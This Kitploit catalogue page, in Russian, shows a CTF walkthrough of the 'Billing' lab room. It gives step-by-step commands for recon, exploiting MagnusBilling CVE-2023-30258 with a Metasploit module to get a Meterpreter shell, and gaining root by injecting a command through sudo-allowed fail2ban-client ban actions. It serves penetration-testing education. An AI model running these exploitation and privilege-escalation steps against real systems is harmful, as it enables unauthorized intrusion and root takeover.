Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Room-Walkthrough-Billing — Подробное пошаговое руководство по эксплуатации уязвимости CVE-2023-30258 в Billing room и повышению привилегий через неправильную конфигурацию fail2ban | Kitploit
Инструменты/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

Подробное пошаговое руководство по эксплуатации уязвимости CVE-2023-30258 в Billing room и повышению привилегий через неправильную конфигурацию fail2ban

Репозиторий
1411 месяц назадЕщё не проверено

🧠 Прохождение комнаты: Billing

Автор: Aditya Bhatt | Участник открытого кода


📦 Обзор

В этом прохождении мы с головой погружаемся в Billing Room, демонстрируя уязвимый экземпляр MagnusBilling, сочный RCE без аутентификации (CVE-2023-30258) и неправильную конфигурацию sudo для fail2ban, которая кричит «рутни меня».

Эта комната прекрасно сочетает автоматизированную эксплуатацию с креативным повышением привилегий, давая нам практический вкус реальных уязвимостей, скрытых в VoIP-биллинговом ПО. Мы пройдём путь от Первичной разведки до Root-оболочки с полным PoC, комментариями и атмосферой 🗿.


🌐 Шаг 1: Фаза разведки

🏁 Первый вход

После развёртывания машины первое, что бросается в глаза, как неправильно настроенный брандмауэр:

root@kitploit:~
http://<machine_IP>/mbilling/

Это страница входа MagnusBilling. Один её вид вызывает тревогу — вы понимаете, что вас ждёт сочная игра с CVE.

Site


🔍 Глубокая разведка Nmap + Gobuster

Начинаем с ультимативной разведывательной комбинации:

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 Результаты:

  • Порт 5038 – Asterisk Call Manager/2.10.6
  • Другие HTTP-сервисы доступны через /mbilling/

Далее идём в лобовую с Gobuster:

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Результаты:

  • robots.txt

Robots

🏗️ robots.txt

Затем проверяем robots.txt сайта на предмет чего-нибудь пикантного:

root@kitploit:~
User-agent: *
Disallow: /mbilling/

Хм… попытка спрятать только разжигает наш аппетит 😈

Robots


🔌 Шаг 2: Эксплуатация

🔥 Порт 5038 – Asterisk Manager

Быстрая проверка через netcat подтверждает ответ:

root@kitploit:~
Response: Error
Message: Missing action in request

Это ещё раз подтверждает: бэкенд — MagnusBilling, а порт связан с Asterisk Call Manager. Время вызывать тёмные искусства 🧙

5038


⚔️ Оружие выбора: CVE-2023-30258

Эксплойт: Удалённое выполнение кода без аутентификации в MagnusBilling Модуль: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Запускаем Metasploit:

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

Затем проверяем требования:

root@kitploit:~
show options

msf_2

Затем устанавливаем следующее:

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

Через несколько секунд… Бум. Мы получили сессию Meterpreter!

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

Попытались запустить TTY-оболочку:

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 Шаг 3: Получение флага пользователя

Начинаем подниматься вверх с помощью:

root@kitploit:~
cd ..
cd ..

msf_5_2

Пока не находим:

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

Отлично! Но мы ещё не закончили. Нам нужен root, и Magnus шепчет нам секреты.


🧨 Шаг 4: Повышение привилегий

Проверим, что мы можем запускать с помощью sudo:

root@kitploit:~
sudo -l

Результат:

root@kitploit:~
(ALL) NOPASSWD: /usr/bin/fail2ban-client

Это 🔥. Мы можем злоупотребить fail2ban-client для выполнения команд от имени root с помощью действий блокировки.


🎯 Злоупотребление Fail2Ban → Root Shell

Перезапустим fail2ban:

root@kitploit:~
sudo /usr/bin/fail2ban-client restart

Затем внедрим команду для кражи root-флага:

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Инициируем блокировку (и тем самым выполнение команды):

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Затем:

root@kitploit:~
cat /tmp/root.txt

msf_7

Root’нут. Как босс. 🗿🔥


✅ Итоговая сводная таблица


🧠 Что вы узнали (aka Мудрость полупрофи)

  1. 🔍 Разведка — это не просто сканирование – Ищите скрытые страницы, проверяйте robots.txt и копайтесь в необычных портах.
  2. 💣 Используйте известные CVE – MagnusBilling оказался уязвим для публичного эксплойта (CVE-2023-30258).
  3. 🔓 Повышение привилегий не всегда означает эксплойты ядра – Неправильно настроенные права sudo (как на fail2ban-client) не менее опасны.
  4. ⚙️ Творчество имеет значение – Обход ограничений пользователя с помощью действий блокировки демонстрирует реальное нестандартное мышление.

🗿 Заключительные слова

Эта машина была прекрасным балансом автоматизированной эксплуатации и ручного творчества после эксплуатации. От RCE в MagnusBilling до рутинга через fail2ban — она попадает во все ноты плейлиста пентестера 🎧🎯

Будь вы новичок, стремящийся прокачаться, или опытный воин, собирающий флаги — эту машину надо взломать.

До следующей встречи, Оставайтесь Опасными. Оставайтесь Любопытными. Оставайтесь Величественными. 🗿

Скачать инструмент
🔎 Этап💥 Действие / Используемый инструмент
Первоначальный доступОбнаружен портал /mbilling и порт 5038 с помощью Nmap + Gobuster
Разведывательные находкиCMS MagnusBilling + Asterisk Call Manager
ЭксплуатацияCVE-2023-30258 через Metasploit → оболочка Meterpreter
РазведкаНайден /home/magnus/user.txt
Повышение привилегийЗлоупотребление fail2ban-client (sudo NOPASSWD) → RCE от root
Root-флагПолучен /root/root.txt через внедрение полезной нагрузки fail2ban